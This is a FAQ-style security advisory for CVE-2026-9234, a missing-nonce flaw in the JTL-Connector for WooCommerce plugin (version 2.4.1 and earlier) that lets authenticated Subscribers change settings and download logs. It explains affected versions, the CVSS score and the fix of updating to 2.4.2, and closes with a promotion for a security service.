Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the JTL-Connector for WooCommerce plugin version 2.4.1 or earlier is potentially vulnerable. Attackers with authenticated access, specifically those with Subscriber roles or higher, can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps to verify the vulnerability
To check if your site is vulnerable, verify the version of the JTL-Connector plugin installed. If it is version 2.4.1 or earlier, your site is at risk. Additionally, review your site’s access logs for any unauthorized modifications or downloads.
How can I fix this vulnerability?
Steps to mitigate the issue
The recommended fix is to update the JTL-Connector for WooCommerce plugin to version 2.4.2 or later, where the vulnerability has been patched. Ensure that you regularly update all plugins to their latest versions to mitigate security risks.
What does the CVSS score of 4.3 indicate?
Understanding the severity rating
A CVSS score of 4.3 is considered medium severity, indicating that the vulnerability poses a moderate risk. It suggests that while exploitation is possible, it may require some level of authenticated access, thus limiting the potential impact compared to high-severity vulnerabilities.
What are nonce checks and why are they important?
Role of nonce verification in security
Nonce checks are security tokens used in WordPress to verify that a request comes from a legitimate source. They help prevent CSRF (Cross-Site Request Forgery) attacks. The lack of nonce verification in this vulnerability allows attackers to make unauthorized requests.
What kind of data can be compromised?
Potential risks associated with exploitation
Exploitation of this vulnerability can lead to unauthorized modification of plugin settings, including sensitive information like API keys and passwords. Attackers can also download log files that may contain sensitive order data and system information, compromising the confidentiality of the site.
What is the proof of concept (PoC) for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an authenticated attacker can log in as a Subscriber and send crafted requests to exploit the vulnerability. It outlines the steps to log in, access the vulnerable endpoints, and perform unauthorized actions.
What should I do if my site has been exploited?
Response to a security breach
If your site has been exploited, immediately change all passwords, particularly for admin accounts. Review logs for unauthorized changes, restore from a clean backup if necessary, and ensure the plugin is updated to the latest version to close the vulnerability.
How can I enhance security for my WordPress site?
Best practices for WordPress security
To enhance security, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and consider security plugins that monitor for vulnerabilities. Regularly review user roles and permissions to limit access.
Where can I find more information about this vulnerability?
Resources for further reading
For more information on CVE-2026-9234, you can refer to the official CVE database, security advisories from the plugin developers, and security-focused websites that analyze vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations